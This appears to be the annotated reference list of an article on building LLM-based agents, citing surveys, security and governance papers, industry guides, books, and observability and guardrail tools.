Multi-Agent Survey — Guo, T. et al. “Large Language Model based Multi-Agents: A Survey of Progress and Challenges”, 2024. Focused survey on LLM-based multi-agent systems — covers communication protocols, coordination mechanisms, and failure modes specific to multi-agent orchestration.
Chain-of-Thought Prompting — Wei, J. et al. “Chain-of-Thought Prompting Elicits Reasoning in Large Language Models”, NeurIPS 2022. The reasoning technique that powers agent planning modules.
Agent2Agent (A2A) Protocol — Google, “Agent2Agent Protocol”, 2025. An open standard for inter-agent communication, enabling agents built on different frameworks to discover capabilities and collaborate across trust boundaries.

Safety and Security

OWASP Top 10 for LLM Applications — OWASP Foundation, 2023–2025. Industry-standard security risks for LLM applications, including “Excessive Agency” — essential reading for anyone deploying agents.
Prompt Injection — Greshake, K. et al. “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection”, 2023. Demonstrates how prompt injection can hijack agent tool calls — motivating sandboxing and approval gates.
Practices for Governing Agentic AI Systems — OpenAI, “Practices for Governing Agentic AI Systems”, 2023. Framework for safe deployment of autonomous AI agents — covers oversight levels, access controls, audit trails, and monitoring recommendations that complement OWASP’s technical risk taxonomy.

Industry Guides

Building Effective Agents — Anthropic, “Building effective agents”, 2024. Anthropic’s practical guide to agent design — recommends starting simple, human-in-the-loop, and incremental complexity.
A Practical Guide to Building Agents — OpenAI, “A practical guide to building agents”, 2025. OpenAI’s comprehensive guide covering agent design patterns, orchestration strategies, and guardrails for production deployments.
OpenAI Function Calling Best Practices — OpenAI, “Function calling guide”, 2024. Official guidance on tool design, descriptions, and structured outputs for agent systems.

Books

Stuart Russell & Peter Norvig — Artificial Intelligence: A Modern Approach, 4th ed., Pearson, 2020. The definitive textbook on intelligent agents. Chapters 2–4 define the agent concept, environment types, and rational behaviour that LLM agents inherit.
Chip Huyen — AI Engineering, O’Reilly, 2025. Covers building LLM applications in production, including agent architectures, observability, evaluation, and deployment patterns. The most relevant production guide for agent builders.
Jay Alammar & Maarten Grootendorst — Hands-On Large Language Models, O’Reilly, 2024. Practical guide with code examples covering prompt engineering, RAG, tool use, and the agent patterns these best practices build on.
Sebastian Raschka — Build a Large Language Model (From Scratch), Manning, 2024. Understand the LLM internals — pre-training, fine-tuning, RLHF — that power the reasoning engine at the core of every agent.
Harrison Chase & Jacob Lee — LangChain & LangGraph Documentation, LangChain, 2023–2026. The most widely adopted Python ecosystem for building agents. LangGraph — the graph-based orchestration layer — is the recommended path for production agent workflows, supporting cycles, persistence, and human-in-the-loop patterns.
Spring AI Reference Documentation — Spring, 2024–2026. Comprehensive framework for building AI-powered Java applications with first-class support for tool calling, structured outputs, advisors, and agent patterns — bringing the Spring ecosystem’s conventions to LLM engineering.

Tools & Platforms

LangSmith — Observability, tracing, and evaluation platform for LLM applications and agents. The go-to for trajectory-level debugging.
Arize Phoenix — Open-source LLM observability with trace visualization and embedding analysis.
Braintrust — Evaluation and logging platform with support for agent trajectory scoring and regression detection.
E2B — Sandboxed cloud environments for safe agent code execution — the standard for code-executing agents.
Spring AI Structured Output — Map LLM responses to Java records and POJOs with BeanOutputConverter or the entity() API. Essential for reliable agent-tool communication in the Spring ecosystem.
Outlines — Grammar-constrained generation for open-source models. Guarantees structured output without post-hoc parsing.
Guardrails AI — Open-source framework for adding input/output validation, safety checks, and format enforcement to LLM applications.
NVIDIA NeMo Guardrails — Programmable guardrails for controlling agent behaviour in conversational systems.
Model Context Protocol (MCP) — Anthropic, 2024. Open standard for connecting LLMs to external tools and data sources. Rapidly adopted as the universal protocol for agent-tool integration across frameworks and providers.
OpenAI Agents SDK — OpenAI, 2025. A lightweight, open-source Python framework for building multi-agent workflows with built-in handoffs, guardrails, and tracing.
Google Agent Development Kit (ADK) — Google, 2025. An open-source framework for building, evaluating, and deploying multi-agent systems with native A2A and MCP support.